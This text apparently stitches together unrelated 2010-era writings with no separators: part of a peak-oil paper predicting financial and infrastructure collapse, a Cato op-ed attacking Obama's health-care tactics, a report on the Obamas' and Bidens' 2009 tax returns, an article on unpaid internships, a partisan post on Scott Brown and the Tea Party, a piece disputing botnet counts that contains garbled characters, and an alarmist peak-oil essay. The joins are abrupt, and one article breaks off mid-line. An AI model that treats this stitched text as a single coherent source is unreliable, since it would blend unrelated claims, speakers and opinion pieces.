Eventually , it will become clear that almost all debt outstanding cannot be repaid , except in hugely devalued money .
If a small percentage of people in an economy cannot service their debts , their secured assets may be taken .
This is necessary to maintain the banking system 's viability .
Likewise , a nation 's standing within the bond market is dependent upon it striving to repay its debts .
But there must come a point when a critical mass of defaulters rises to such a level that there is no longer the political will to enforce the confiscation of assets , or there is active defiance against debt collectors .
Furthermore , when a nation realises the bond market will no longer facilitate borrowing because growth cannot be maintained , the market and social cost of defaulting drops , while the benefit of doing so rises .
This social cost , in general , falls further in the queue , the farther you fall behind the initial defaulter .
Increasing fears of banking collapse are likely to lead to panics by depositors trying to retrieve their money , but as we have seen , the money is not there .
Traditionally the job of the Central Bank is to stand behind a bank with emergency cash .
But such models are not designed to manage a system - wide insolvency crisis on this scale .
We can ask what this means for the monetary system .
We remember that we only exchange something of intrinsic value for money , if we assume that money can be exchanged elsewhere for something of intrinsic value in time and space .
The two monetary conditions for this are stable exchange rates and low inflation .
Both of these embody our trust in counter - party currencies and our perceptions of future risks .
The other co-dependent pillar of the monetary system is bank intermediation .
But the banking system of necessity must become insolvent as their assets ( loans ) vaporize and their capital disappears .
However , unlike today there can be no bail - out as governments will be just as insolvent .
We can list some of the risks to monetary stability :
As money supply shrinks , unemployment rockets , and government finances fall apart , there will be the temptation to assuage short - term public anger by printing money to pay wages .
This could drive inflation and hyper-inflation .
A severe collapse in production and supply chains could lead to an overhang of money in an economy as against goods and services , driving inflation .
Fears of inflation , and fears over expectations of future availability of important goods , could drive inflation .
A collapse of the banking system and / or a failure of banking infrastructure ( see sec. 6.4 ) ) may mean that money and records are not available to enable transactions .
Since some 97 % of money is digital , and the global ability to print quality notes per unit of time is small , there is a possibility of an almost complete absence of tradable money .
If production collapses in potential trading partners , there is likely to be increased banking intermediation risk , increased risks of civil unrest , and a loss of trust ; one may not want to hold that country 's currency as there is a large risk of not being able to exchange it for intrinsically useful assets .
For similar reasons , they may not want to hold our currency .
This becomes a mutually reinforcing feedback driving out monetary confidence globally .
Money , and exchange rates we might say , are becoming opaque .
Difficult to value in space , which supports trade ; and time , which supports investment and saving ; which together scupper economic life .
Bank intermediation , credit , and confidence in money holding value is the foundation of the complex trade - networks upon which we rely .
The financial situation described will expose what heretofore has not been a problem ; the mismatch between our dependencies upon globalised integrated supply - chains , local and regional monetary systems , and nationalised economic policy .
A complete collapse in world - trade is an extreme but not unlikely consequence .
The failure of production within the economy will mean that almost all income is absorbed by food and energy , but there will be little income to pay for it .
Importing energy , food , and inputs for the production process into a country will only be possible by exporting something of equal value because running trade deficits is based upon credit .
Monetary opaqueness may mean that barter or hard currency ( gold , oil , grain , wood ) may be used to settle accounts .
With the collapse of production within a country comes the collapse of exports too , from which follows a further inability to import energy or materials to increase production .
As explained earlier , modern economies produce almost nothing indigenously , increasing dramatically the probability of supply - chain breakdowns causing key inputs in the production processes to disappear , further stalling production .
Thus countries are likely to remain trapped with limited economic activities .
And because our supply - chains are so complex and globalised , we may not be able to import important items even if we had something to exchange .
This happens because our supplier may have lost some critical inputs into its supply - chain , or lost its operational , social , or informational capacity locally .
This means that local supply - chain failures quickly become globalised .
6.3 Financial System Dynamics
Money only has value because it can be exchanged for a real asset such as food , clothing , or a train journey .
As long as we share the confidence in monetary stability we can save , trade and invest .
Like bonds and shares , it is a virtual asset , as it represents only a claim on something physically useful [ 58 ] .
However , the current valuation of virtual assets towers over real productive assets on which their value is supposed to be based .
A bond is valuable because we expect to be paid back with interest some years hence ; paying twenty times earnings for shares in a company is a measure of confidence in the future growth of that company .
The output of real productive assets must collapse because of energy and resource constraints and the failing operational fabric .
The implication is that virtual wealth including pension funds , insurance collateral , and debt will become worthless .
The acknowledgment by market participants that peak oil is upon us , coupled with an understanding of the consequences is likely to permanently crash the global financial system .
That is , the behavior of the market is based on a combination of ( a ) fundamental physical constraints , such as rising loan defaults induced by the current economic crisis , ( b ) energy and food price inflation , and ( c ) interactions of ( a ) and ( b ) with the hopes and fears of market participants , particularly their faith in the overall stability and continued growth of the system .
The transition from a few market participants accepting the idea that peak oil is a major constraint , and large - scale acceptance can be very rapid , though the onset of the fast transition can be difficult to predict .
In other words : growing government , corporate , and public acceptance of peak oil , will initiate a fear - driven conversion of a mountain of paper virtual assets into a mole - hill of resilient real assets which will help precipitate an irretrievable collapse of the financial and economic system .
Such a transition can be expected to be fear - driven and mutually reinforcing .
This is part of the reflexivity of markets , in George Soros 's phrase ; or an example of a positive feedback , in the language of dynamical systems .
In this context we can understand reported pressure placed upon the International Energy Agency by the United States to overstate future production in its World Energy Outlook 2009 [ 59 ] .
The end - point will be a collapse in bond and equity values .
This is a result of various reinforcing processes , including loss of confidence in debt repayment , monetary confidence , supply - chain disruption , evolving diseconomies of scale , and massive potential losses in discretionary consumption .
The result for market participants would be a rush to extract virtual assets ( money , bonds , shares , derivative instruments ) to convert them into productive , non-discretionary assets ( resilient energy assets , land , farm tools , gold ) .
However , there is a vast imbalance in their respective size .
In all , total paper assets are probably valued at over $ 300 Tr , supported on a Gross World Product of about $ 55 Tr , which itself must collapse .
In comparison , the total clean - tech market capitalisation is about $ 1 Tr . In order to get an indication of the ability of the clean - tech sector to absorb investment , we note a record global investment in renewable power of $ 140 billion in 2008 .
The vast mismatch is clear , even assuming there were willing sellers of renewable assets or land .
Green - field renewable infrastructure investments ( building wind turbines , solar PV cells , DC cabling ) are likely to have limited ramp - up rates , which if on the scale of investment increases between 2007 and 2008 would be of the order of 16 % .
This means pension funds , sovereign funds , insurance funds , and other major holders of such assets will lose everything , with little hope of asset conversion .
Maintaining value in cash is likely to be ineffective because of deflation blocking conversion , or extreme inflation eroding the valuation of cash holding .
It should be clear from the body of the text that one could expect much of the greentech sector to collapse due to failing operational fabric , so the rush will be to secure actual turbines / solar PV panels , or to produce them before systems begin to fail .
This means that there is a very small conversion window and that only a tiny fraction of investors will get out of virtual assets , to secure the small amount of real resilient assets .
6.4 Critical Infrastructure
Economies of scale are the familiar benefits of a globalised world .
They mean that not only can goods or services be produced more cheaply , meaning greater sales volumes , but also their availability frees up discretionary income that can be spent on other goods and services .
In the energy - economic environment so far discussed , this process goes into reverse .
The rising prices of goods ( because of the energy and resource cost , supply - chain and money risk reasons ) and the reduced discretionary income reduces the number of goods sold , thus reducing broader economies of scale .
These feed back into the rising cost of goods , reducing further the number of sales .
This dynamic is expected to be most forceful for the most advanced technologies .
For example , as fewer users can afford to replace mobile phones or computers , or use them less , the cost of the personal hardware and maintaining the network rises per user .
Rising costs mean less discretionary use .
But because common IT platforms require a large number of users , and economies of scale support the most discretionary use ( say Facebook , texting , and Playstation ) and the more important uses ( business operations , banking , electric grid emergency services ) , the cost for businesses and critical services is likely to begin to escalate .
The components of infrastructure have been designed with the assumption that inputs to maintain , repair and upgrade would be on - stream .
In addition component lifetime is often short ( 3 - 5 years for laptops and mobile phones ) .
Furthermore most faults cannot be repaired locally without complex ready - packaged components .
We remember that the most complex infrastructure has the most complex supply - chains and is more likely to have more inputs with fewer substitutes .
Thus there is greater risk of critical infrastructure operational failure for want of a critical element .
The complex sourcing and production over the globe means each nation 's particular economic , monetary , and social predicament becomes tied to our own , and ours to theirs .
To the above risks we must add the local economic and monetary risks , and our ability to import energy .
This interacting nest of conditions means that we could see cascading failures in the grid , health service , IT systems , telecommunications , and water / sewage systems .
This leaves us with the risk of a near complete systemic failure in the operational fabric upon which our welfare depends .
Failing infrastructure feeds back into reduced economic activity and energy use , further reinforcing failing infrastructure .
6.5 Food
Global food production is already straining against a rising demand and the stresses of soil degradation , water constraints , over - fishing , and the burgeoning effects of climate change [ 60 ] .
It is estimated that between seven and ten calories of fossil fuel energy go into every one calorie of food energy we consume .
For example , it has been estimated that without nitrogen fertilizer , produced from natural gas , no more than 48 % of today 's population could be fed at the inadequate per capita level of 1900 [ 61 ] .
Today it is true to say that no country is self - sufficient in food production .
The fragility of global food production will be exposed by a decline in oil and other energy production .
It is not just the more direct energy using inputs that would be affected such as fertilisers , pesticides , seeds , and diesel spares for machinery , and transport .
The failing operational fabric may mean there is no electricity for refrigeration , for example .
It should be clear even from the above overview that a major financial collapse could not just cut actual food production , but could result in food left rotting in the fields , an inability to link surplus production with those in need , and an inability to enact monetised food transactions .
Our critical reliance upon complex just - in - time supply - chain networks mean that there is little buffering to protect us from supply shocks .
In the event of a shock , and without any planning , it is likely that unrelieved hunger could spread rapidly .
Even for a country that could be food independent , and even a potential net exporter , it may years to transition as old systems fail and new ones put in place ( rationing systems , education , re-location of farm laborers , horse breeding , nutrient re-cycling systems , seasonal re-adjustment of production , tool production , storage and preservation skills and products ) .
In the interim , the risks are severe .
6.6 Energy Production
We have focussed upon peak oil , although we have mentioned concern about peak gas and even coal .
Here we wish to outline the principle issues around how a decline in oil production would affect the use of other energy carriers .
The central point to be aware of is that the production and delivery of all fuels not only maintains the operational fabric of the globe , but is also part of , and dependent upon it .
The use of different energy vectors are tightly coupled .
Oil is predominantly a transport fuel , however its demand is tied to production in the wider economy , which is dependent upon natural gas and coal via electricity production .
The reverse is also true : a forced reduction in oil use would induce a system - wide reduction in electricity and heating use .
They are also coupled within the energy production process itself : oil is used to transport coal and re-supply the infrastructure of natural gas and coal .
The water required in much of the energy process and in electricity production is obtained by diverse fuels .
At a wider level , all energy carriers interact to maintain the operational fabric .
If this operational fabric fails , continued production , processing and distribution of all energy carriers may be imperilled .
Reduced production in one energy carrier can cause a reduction in the others in a reinforcing feedback .
A fall in income for energy producers would reduce their ability to bring on new production and to maintain existing energy infrastructure .
Because the exploration and development of all fossil fuels , renewable technologies , and nuclear power are on an upward path of higher energy and financial costs and operational complexity , they are particularly dependent on high real prices being maintained , and continual inputs of high complexity inputs .
For example , much future natural gas supplies ( and coal ) are expected to be produced from remote regions such as Siberia , requiring huge up front investments of fixed pipelines , which require long - term confidence in purchaser solvency and monetary stability .
Other sources , in Qatar for example , will require a ramp - up of liquefaction / gasification plants and specialised ships .
Again this requires huge upfront costs ; and open supply - chain inputs to provide a complex infrastructure that in many cases is at the limits of current technology .
The likely inability of the global economy to re-boot will mean that potential supply may exceed demand for years .
All the while , the loss of the operational fabric may mean potential future production becomes lost to the entropic decay of energy infrastructure and the diseconomies of scale in running large facilities with low volumes of production .
Usually when we talk of energy security we are in particular referring to the fuel .
However the failure of the operational fabric might mean that fuel is available , but we cannot pay for it ; the electric grid collapses ; or repairs to the natural gas pipeline network cannot be maintained .
Monetary collapse may mean all energy carriers are not traded except under barter type arrangements .
References
[ 56 ] Douthwaite , R. ( 1996 ) Short Circuit : Strengthening Local Economies for Security in an Unstable World .
The Lilliput Press .
[ 57 ]
Seabright , P. ( 2005 ) The Company of Strangers : A Natural History of Economic Life .
Princeton Univ. Press .
[ 58 ] Soddy , F. ( 1926 ) Wealth , Virtual Wealth and Debt : the Solution of the Economic Paradox .
George Allen & Unwin .
[ 59 ]
Key oil figures were distorted by US pressure , says whistleblower Guardian 9th Nov. ( 2009 ) .
[ 60 ] Godfray , H et. al. ( 2010 ) Food Security : The Challenge of Feeding 9 Billion People .
Science Vol. 327 .
[ 61 ] Smil , V. ( 1999 ) Long - Range Perspectives on Inorganic Fertilizers in Global Agriculture .
International Fertilizer Development Centre .
President Obama ’s attempts to ram health - care reform through an increasingly reluctant Congress are starting to resemble a really eventful episode of “ The Sopranos . ”
Whether or not you believe former Rep. Eric Massa ’s bizarre accusations of locker - room confrontations and conspiracies to drive him from office , there is no doubt that the Obama administration and its congressional allies are willing to use every trick in the book to get this bill passed .
They ’ve already bought votes with pork and special deals — the “ Louisiana purchase ” ( $ 300 million to bolster that state ’s Medicaid program , which swayed Sen. Mary Landrieu ) ; the “ Cornhusker kickback ” ( $ 100 million to Medicaid there , sweetening the pot for Sen. Ben Nelson ) , and Florida ’s “ Gator Aid ” ( a Medicare deal potentially worth $ 5 billion , a hefty price for Sen. Bill Nelson ’s vote ) .
Plus the millions for Connecticut hospitals , Montana asbestos abatement and so on .
Nor were the Obamans willing to let a little thing like election laws stand in the way .
They rewrote Massachusetts law to allow for an appointed senator to hold office for several months , hoping to get the bill through before the special election that Scott Brown ultimately won .
Their plans spoiled , they even considered holding up Brown ’s seating to let the appointed senator continue to vote on health care — until public outrage forced them to back down .
And , of course , there has been an unprecedented willingness to ignore congressional rules — from the failure to appoint a “ conference committee ” to negotiate differences between the House and Senate bills , to their current plans to use the reconciliation process to bypass a Republican filibuster .
Expect the tactics to get even dirtier now .
Those who support the president can expect favors .
No sooner had Rep Jim Matheson ( D - Utah ) suggested that he might be willing to switch his vote and support the latest version of ObamaCare than his brother was nominated for a federal judgeship .
Alan Mollohan ( D - W.Va . ) is also on the undecided list .
And , purely by coincidence no doubt , the Justice Department just announced that it is dropping an FBI investigation that has been swirling about the congressman .
Gosh , if only Charlie Rangel were one of the undecideds .
Those who oppose the president can expect the political equivalent of a horse head between their sheets .
Some of this is just traditional electioneering :
On - the - fence Arkansas Sen .
Blanche Lincoln is getting a primary challenger with some backing from the national Democratic machine .
But some of it is much nastier .
Massa ’s story may have credibility issues , but other opponents of the bill are also starting to feel the heat .
For instance , Rep. Bart Stupak ( D - Mich . ) , whose opposition to abortion funding has become one of the bill ’s biggest hurdles , is now seeing attacks on his ethics .
MSNBC host Rachel Maddow recently questioned the legality of the low rent that a conservative Christian group charges Stupak for his DC apartment .
She even noted ominously that disgraced South Carolina Gov. Mark Sanford stayed at the same building .
The liberal blog Daily Kos has picked up on the charges and suggested that both the IRS and the House Ethics Committee investigate .
“ Politics ai n’t beanbag , ” as Mr. Dooley noted .
Presidents have always twisted arms and made deals .
And when two - thirds of voters are opposed to your plans , you may have no choice but to play hardball .
But when Obama promised to change the way Washington does business , we did n’t think he meant making it a “ family ” business .
Michael Tanner is a Cato
In stitute senior fellow .
President Obama and his wife , Michelle , paid $ 1.8 million in federal taxes for 2009 , from an income of $ 5.5 million -- more than twice what they made in the previous year , the White House announced on its blog today .
Their joint filing is here .
The precise tax bill is $ 1,792,414 .
The first family 's income : $ 5,505,409 .
The bulk of the president 's income comes from the continuing sales of his books , Dreams From My Father and The Audacity of Hope , according to the White House statement .
The Obamas also reported paying $ 163,303 in Illinois state income taxes for 2009 .
Last year , the Obamas paid $ 855,323 in federal income tax , as well as $ 77,883 in state income taxes .
They reported an adjusted gross income of $ 2,656,902 for the year 2008 , again mostly through book sales .
Their joint return from last year is here .
The president 's 2009 income does NOT include the $ 1.4 million he got for winning the Nobel Peace Prize , the White House statement said , because Obama donated it all to 10 charities .
Beyond the Nobel money , Mr. and Mrs. Obama also reported donating $ 329,100 to 40 different charities .
The White House also released tax returns for Vice President Biden and his wife , Jill .
The Bidens paid $ 71,147 in federal income taxes , from an adjusted gross income of $ 333,182 .
They paid $ 12,420 in Delaware income taxes and $ 1,477 in Virginia income taxes .
Mrs. Biden teaches English at Northern Virginia Community College .
The Bidens ' charitable deductions totaled $ 4,820 , in both cash and in - kind donations .
Here is the complete statement from the White House :
Today , the President released his 2009 federal income and gift tax returns .
He and the First Lady filed their income tax return jointly and reported an adjusted gross income of $ 5,505,409 .
The vast majority of the family 's 2009 income is the proceeds from the sale of the President 's books .
The Obamas paid $ 1,792,414 in federal income tax .
The President and First Lady also reported donating $ 329,100 to 40 different charities .
The largest reported gifts to charity were $ 50,000 contributions to CARE and the United Negro College Fund .
In addition , the President donated his $ 1.4 million Nobel Prize funds to 10 charities .
The President and First Lady also released their Illinois income tax return and reported paying $ 163,303 in state income tax .
The Internal Revenue Code provides that if the recipient of the Nobel Prize directs the Nobel Committee to donate the prize income directly to charity , as the President did , the recipient does not have to recognize the prize as income on his federal income tax return .
The President is not permitted to take a charitable deduction on the value of the prize since it is not included in his income .
The Vice President and Dr. Jill Biden also released their 2009 federal income tax returns , as well as state income tax returns for both Delaware and Virginia .
They filed joint federal and Delaware income tax returns .
Dr. Biden filed a separate non-resident tax return for the state of Virginia .
Together , they reported an adjusted gross income of $ 333,182 .
The Bidens paid $ 71,147 in federal income taxes for 2009 .
They paid $ 12,420 in Delaware income taxes and $ 1,477 in Virginia income taxes .
The Bidens contributed $ 4,820 to charity , in both monetary and in - kind donations .
( Posted by David Jackson )
A New York Times report that the Labor Department is cracking down on unpaid internships has generated a flood of comments on the Times web site and elsewhere – and no wonder .
College students and other young job seekers have experienced mounting pressure to take internships without pay , in hopes of getting a foot in the door to a real job .
University career offices often promote these positions , in what some see as a cozy enabling relationship with employers .
For example , the Times reports , unpaid internships posted at Stanford University ’s career office have tripled in the past two years , “ fueled by employers ’ desire to hold down costs and students ’ eagerness to gain experience for their résumés . ”
Others note that “ unpaid internships are about all one can find ” in job listings on the popular Craigslist web site .
The Labor Department ’s Wage and Hour Division , beefed up with increased funding and enforcement staff , says it is going after companies that do not pay interns according to the law .
“ If you ’re a for - profit employer or you want to pursue an internship with a for - profit employer , there are n’t going to be many circumstances where you can have an internship and not be paid and still be in compliance with the law , ” Nancy J. Leppink , acting director of the wage and hour division , told the Times .
While only 9 percent of graduating students had held internships in 1992 , by 2006 that number was up to 83 percent , according to a new report by the Economic Policy Institute .
That represents at least 2.5 million student workers each year .
Of those , it ’s estimated that one - fourth to one - half are unpaid .
The EPI study , released April 5 , is titled “ Not - So - Equal Protection - Reforming the Regulation of Student Internships . ”
It notes that internships are often beneficial for both students and employers .
However , the report says , “ Despite internships ’ importance to the labor market as a crucial form of vocational training and pre-employment vetting , they are only loosely regulated through vague and outdated employment law .
Moreover , these regulations go essentially unenforced . ”
That lack of regulation and enforcement , the EPI says , “ has fostered the growth of unpaid internships , which in turn limits participation to only the students who can afford to forego wages and pay for living expenses , effectively institutionalizing socioeconomic disparities . ”
As the Times article put it , unpaid internships favor “ well - to - do and well - connected students , speeding their climb up the career ladder . ”
Moreover , lack of regulation of internships “ permits ( and even incentivizes ) the replacement of regular workers with unpaid college students and recent graduates , ” the EPI report says .
“ The increasingly competitive labor market for college graduates , combined with the effects of the recession , has intensified the trend of replacing full - time workers with unpaid interns . ”
Commenting on the Times site , one woman wrote : “ When I was in college , many of my peers took full - time , 40 + hour a week , completely unpaid ‘ internships ’ for the entire summer .
I enviously saw them toil in their chosen field for no money , while I was desperate to get any job I could that would pay my rent and bills , as I was responsible for ALL of my own costs in college – rent , food , bills , and tuition .
… of course their connections through the glamorous world of unpaid internships got them much farther than my ‘ real job ” did . ”
Another wrote , “ Back in the eighties and nineties , exploitation of interns at magazines was disturbingly obvious .
This young , mainly female population did lots of grunt work . …
The less affluent ca n’t afford to intern and those that can put up with poor treatment .
What do you learn from this experience ?
Too often for the successful intern it ’s how to perpetuate low wages and disrespect for workers .
Meanwhile , college graduates who did n’t intern or have other connections are out in the cold because unpaid interns are doing all the entry - level jobs ! ”
“ I never had the chance to do an ‘ unpaid ’ internship , ” labor activist Pat Crowley told this reporter .
“ Going to college meant paying to go to college which meant working full time . ”
He added , “ I ’ve never really gotten the idea of working for free but it is easy to see how folks that do ‘ unpaid ’ internships later become people who expect other people to work for free . ”
The Labor Department considers young workers among the most vulnerable to exploitation , including violation of wage and hours laws .
On April 1 in Chicago , Labor Secretary Hilda Solis kicked off a new wage - theft protection campaign aimed at helping young workers as well as low - wage employees , immigrants ( regardless of legal status ) , women in male - dominated professions , sub - contractors , and the disabled .
The department says the “ We Can Help ” campaign will do outreach to those groups about worker rights and laws and how to get help in filing grievances .
In addition to stricter regulation and enforcement , the EPI report calls for reform of labor laws governing internships .
For details , see the full report .
Photo : http://www.flickr.com/photos/adpowers/
/ CC BY 2.0
Advertisements
Scott Brown ( R - MA ) appeared on NBC - TV’s “ Today ” show this morning .
Brown made his break with the Tea Party final by announcing he would support Mitt Romney over Tea Party darling Sarah Palin , dashing the hopes of many Tea Partiers who had fantasies of a Palin / Brown ticket in 2012 .
The support of the Tea Party and Sarah Palin ’s endorsement are assumed to be responsible for getting Brown his seat in the special election in January of this year .
The Boston Globe reports : “ Asked if he supported former Republican vice presidential nominee Sarah Palin for president , Brown said he supported Romney .
“ Well , I ’m going to support Governor Romney , and I ’m going to see who ’s out there in the field and then make my decision , ” he told interviewer Jamie Gangel on NBC - TV’s “ Today ” show .
Scott Brown on the “ Today ” show April 23 :
Advertisements
Visit msnbc.com for breaking news , world news , and news about the economy
When Brown refused to attend earlier Tea Party events and visibly distanced himself from the divisive Palin ( by , for example , refusing to show up at a Boston Tea Party rally ) , Tea Partiers put on a brave face and clung to their illusions of solidarity .
But there ’s no denying it now .
Brown is just a moderate Republican like Mitt Romney and not a Teapublican after all .
This rejection has got to sting , especially after how hard the Teapublicans have tried to claim him as their one success .
Previously , the Tea Party movement had ruined races for Republicans – such as NY 23 — by dividing the Republican votes to allow a Democratic victory .
In order to avoid this same fate again , Sarah Palin urged the Tea Party to back Brown , claiming he was a real “ conservative ” , but Brown was never a far right Republican .
One wonders how long it will be before the Tea Party begins to realize it was played by Palin and the Republicans , both of whom have agendas that have nothing to do with the supposed issues of the Tea Party .
The Republican party used Sarah Palin who used the Tea Party to back a candidate they all knew did not have the same “ conservative ” values of the Tea Party .
They did this in order to win a seat with an “ R ” label , regardless of whether or not the person actually had “ R ” values .
Palin has been desperately attempting to swing the Tea Partiers to the Republican ticket ( a natural fit as the majority of them are Republican ) , as she knows if the Tea Party comes to the Republicans , the Republicans have to come to her or risk her taking her star power to a third party .
Essentially , this has already happened , which is why the Republican party is now being led around by someone who does n’t know the difference between the song “ America the Beautiful ” and the Constitution .
The fact that the GOP ’s false narrative of competence is now running the show is perfect revenge for years of them selling us turds marked as gold .
Brown knows what side his bread is buttered on :
“ I do n’t really care .
..
I ’m going to be the independent person I have always been . ”
According to Crooks and Liars , “ the Tea Party Express PAC spent nearly $ 300,000 backing Brown or attacking his opponent Martha Coakley .
“ If it was n’t for the Tea Party movement , Scott Brown would n’t have gotten that seat , ” said one Tea Party activist . ”
Ouch .
Did n’t anyone tell Scott to dance with the one who brought ya’ ?
Alfred Huger , VP of engineering at Immunet and a former Symantec executive , says he takes issue with a key metric in Symantec ’s 2009 Internet Security Threat Report released Tuesday , 20 A pril2010 .
Huger says Symantec ’s very specific detection of 6,798,338 distinct bot - infected computers globally is misleading — several magnitudes of order too conservative .
Huger ’s critique is noteworthy since he says he is one of the creators of Symantec ’s ISTR .
Here ’s what he told LastWatchdog :
I do not have enough data to accurately count the number of bots in play in the wild .
Nor do I think Symantec has that data .
I believe the generalized approach to identifying bots used by the report . . .is not likely to derive an accurate estimation of real live bot infected systems .
I think itÃ¢â‚¬â „ ¢s very conservative but itÃ¢â‚¬â „ ¢s as best a bet as you can hope for with real empirical data .
Yet bot networks using peer - to - peer , private authenticated IRC , undiscovered C&C & IRC ( due to fast flux etc ) will forever be invisible to these methods of data collection .
Our data shows that 7 out of 10 threats , which we collect , have the ability to download software .
ItÃ¢â‚¬â „ ¢s our belief that nearly all of these threats will bring software down to allow them to be centrally controlled , therefore becoming bots .
So itÃ¢â‚¬â „ ¢s our estimation that 70 % or more of all infected machines become , at some point , centrally controlled .
We also see that 7.6 % of all users who install our software have a virus already .
Those two numbers lead me to believe that the number of active bots is indeed magnitudes higher than what Symantec is reporting ( and I bet they would agree ) .
How much higher ?
I do not know , certainly 4 or 5 times higher if not much more .
While ultra-competitiveÃ‚Â security vendors squabble about how best to convey the scale of the botnet plague , cybercriminals Ã¢â‚¬â€ from novices to elite gangs Ã¢â‚¬â€ continue to saturate the Internet with infections that allow them to take full control of Windows PCs .
Gunter Ollmann , a leading expert on botnets for years at IBM before he joined Damballa , where he now serves as vice president of research , has volumes of research data to back up his estimates of botnet activity .
On any given day , 12 % to 15 % of the 1.6 billion computers connected to the Internet are bots , according to security firm Damballa .
That would put the number of botted PCs at 19.2 million to 24 million .
“ Getting hold of new botnets , or building a new botnet from scratch has never been easier , ” says Ollmann .
“ Specialist providers for botnet building , bot agent design and bot delivery are plentiful and it has already become largely a commoditized service industry . ”
Adam Swidler , senior product marketing manager with Google ’s Postini group , asserts that botnets operators are thriving and staying one step ahead of the best efforts of security companies , law enforcement and ISPs to keep them in check .
Here ’s Swidler ’s reasoning :
In November 2008 , the ISP McColo was taken offline , and we saw an immediate 70 % drop in spam levels .
By the second half of March 2009 , seven - day average spam volume was at the same volume we saw prior to the blocking of the McColo ISP in November 2008 .
It took 4 months for spammers to recover .
On June 4 2009 , another large ISP spam source , 3FN , was reported to have been dismantled .
Spam volume immediately dropped 30 % Ã¢â‚¬â€œ not as extreme as McColo , but still significant .
Although this created a sudden dip in spam levels , it also created an open invitation for opportunistic spammers to once again seize a market opportunity .
Within a month , spam level were back to pre 3FN levels .
Real Host , a large Latvia - based ISP that was disconnected by upstream providers on August 1 , 2009 .
This takedown did n’t have the same drastic effects of McColo ( last November ) , but it was comparable to 3FN .
Ultimately , the effects of the Real Host takedown lasted only two days , with an initial 30 % drop in spam followed by a quick resurgence .
Meanwhile , efforts led by security firms to temporarily knock out specific botnets , Mega - D , Waledac , Mariposa and ZeuS , cause a negligible drop in spam volume .
These developments underscore how organized and efficient botnet operators have become about keeping their botnet inventories replenished .
– By Byron Acohido
April 20th , 2010 | For consumers |
For technologists | Top Stories
The Imminent Crash Of Oil Supply : Be Afraid
By Nicholas C. Arguimbau
23 April , 2010
Countercurrents.org
What is going to happen and how it came to pass that we were n't forewarned
Look at this graph and be afraid .
It does not come from Earth First .
It does not come from the Sierra Club .
It was not drawn by Socialists or Nazis or Osama Bin Laden or anyone from Goldman - Sachs .
If you are a Republican Tea -Partier , rest assured it does not come from a progressive Democrat .
And vice versa .
It was drawn by the United States Department of Energy , and the United States military 's Joint Forces Command concurs with the overall picture .
What does it imply ?
The supply of the world 's most essential energy source is going off a cliff .
Not in the distant future , but in a year and a half .
Production of all liquid fuels , including oil , will drop within 20 years to half what it is today .
And the difference needs to be made up with " unidentified projects , " which one of the world 's leading petroleum geologists says is just a " euphemism for rank shortage , " and the world 's foremost oil industry banker says is " faith based . "
The original graph is available here http://www.eia.doe.gov/conference/2009/session3/Sweetnam.pdf
This graph was prepared for a DOE meeting in spring , 2009 .
Take a good look at what it says , assuming it to be correct :
1` . Conventional oil will be almost all gone in 20 years , and there is nothing known to replace it .
2.. Production of petroleum from existing conventional sources has been dropping at a rate slightly over 4 % per year for at least a year and will continue to do so for the indefinite future .
3 . The graph implies that we are past the peak of production and that there are750 billion barrels of conventional oil left ( the areas under the " conventionals " portion of the graph , extrapolated to the right as an exponentional ) .
Assuming that the remaining reserves were 900 billion or more at the halfway point , then we are at least 150 billion barrels , or 5 years , past the midpoint .
4 . Total petroleum production from all presently known sources , conventional and unconventional , will remain " flat " at approximately 83 mbpd for the next two years and then will proceed to drop for the foreseeable future , at first slowly but by 4 % per year after 2015 .
5 . Demand will begin to outstrip supply in 2012 , and will already be 10 million barrels per day above supply in only five years .
The United States Joint Forces Command concurs with these specific findings .
http://www.jfcom.mil/newslink/storyarchive/2010/JOE_2010_o.pdf, at 31. 10 million bpd is equivalent to half the United States ' entire consumption .
To make up the difference , the world would have to find another Saudi Arabia and get it into full production in five years , an impossibility .
See The Oil Drum , http://www.theoildrum.com/node/5154
5 . The production from presently existing conventional sources will plummet from its present 81 mbpd to 30 mbpd by 2030 , a 63 % drop in a 20 - year period .
6 . Meeting demand requires discovering , developing , and bringing to full production 60 mbpd ( 105 - 45 ) of " unidentified projects " in the 18 - year period of 2012 - 2030 and approximately 25 mbpd of such projects by 2020 , on the basis of a very conservative estimate of only 1 % annual growth in demand .
The independent Oxford Institute of Energy Studies has estimated a possibe development of 6.5 mbpd of such projects , including the Canadian tar sands , implying a deficit of 18 - 19 mbpd as compared to demand , and an approximate 14 mbpd drop in total liquid fuels production relative to 2012 , a 16 % drop in 8 years .
7 . The curve is virtually identical to one produced by geologists Colin Campbell and Jean Laherrere and published in " The End of Cheap Oil , " in Scientific American , March , 1998 , twelve years ago .
They projected that production of petroleum from conventional sources would drop from 74 mbpd in 2003 ( as compared to 84 mbpd in 2008 in the DOE graph ) and drop to 39 mbpd by 2030 ( as compared to 39 mbpd by 2030 in the DOE graph ! ) .
http://www.jala.com/energy1.php.Campbell and Laherrere predicted a 2003 " peak , " and the above graph implies a ' peak " ( not necessarily the actual peak , but the midpointr of production of 2005 or before .
So here we are , if the graph is right , on the edge of a precipice , with no prior warning from either the industry , which knows what it possesses , or the collective governments , which ostensibly protect the public interest .
As Colin Campbell , a research geologist who has worked for many large oil companies and studied oil depletion extensively ( http://www.peakoil.net/about-aspo/dr-colin-campbell) says , " The warning signals have been flying for a long time .
They have been plain to see , but the world turned a blind eye , and failed to read the message . "
http://www.greatchange.org/ov-campbell,outlook.html
The world was completely transformed by oil for the duration of the twentieth century , but if the graph is right , within 20 years it will be virtually gone but our dependence upon it will not .
Instead , we have
> zero time to plan how to replace cars in our lives
> zero time to plan how to manufacture and install milions of furnaces to replace home oil furnaces , and zero time toproduce the infrastructure necessary to carry out that task
> zero time to retool suburbia so it can function without gasoline
> zero time to plan for replacement of the largest military establishment in history , almost completely dependent upon oil
> zero time to plan to support nine billion peolple without the " green revolution , " a creation of the age of oil
> zero time to plan to replace oil as an essential fuel in electricity production
> zero time to plan for preserving millions of miles of roads without asphalt .
> zero time to plan for the replacement of oil in its essential role in EVERY industry .
> zero time to plan for replacement of oil in its exclusive role of transporting people , agricultural produce , manufactured goods .
In a world without oil that appears only twenty years away , there will be no oil - burning ships transporting US grain to other countries , there will be no oil - burning airlines linking the world 's major cities , there will be no oil - burning ships transporting Chinese manufactured goods to the billions now dependent on them .
> zero time to plan for the survival of the billions of new people expected by 2050 in the aftermath of " : peak everything . "
> zero capital , because of failing banks ansd public and private debt , to address these issues .
Why zero time ?
Because if we at any time use more oil than allowed by the graph , we will have even less later ..
Because we are already committed to supporting 2.5 billion more people on what we have .
Because every day we continue upward in our oil consmption , even though we continue to have more people who need it and billions who deserve to rise from abject poverty , we are making the future supply shortage worse .
